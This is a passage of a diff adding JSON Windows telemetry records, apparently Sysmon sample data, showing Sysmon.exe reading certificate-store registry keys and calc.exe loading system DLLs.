}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "twinui.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244960000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ExtendViewIntoTitleBar", + "registry_value": "ExtendViewIntoTitleBar", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + 
"image_name": "BCP47mrm.dll", + "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 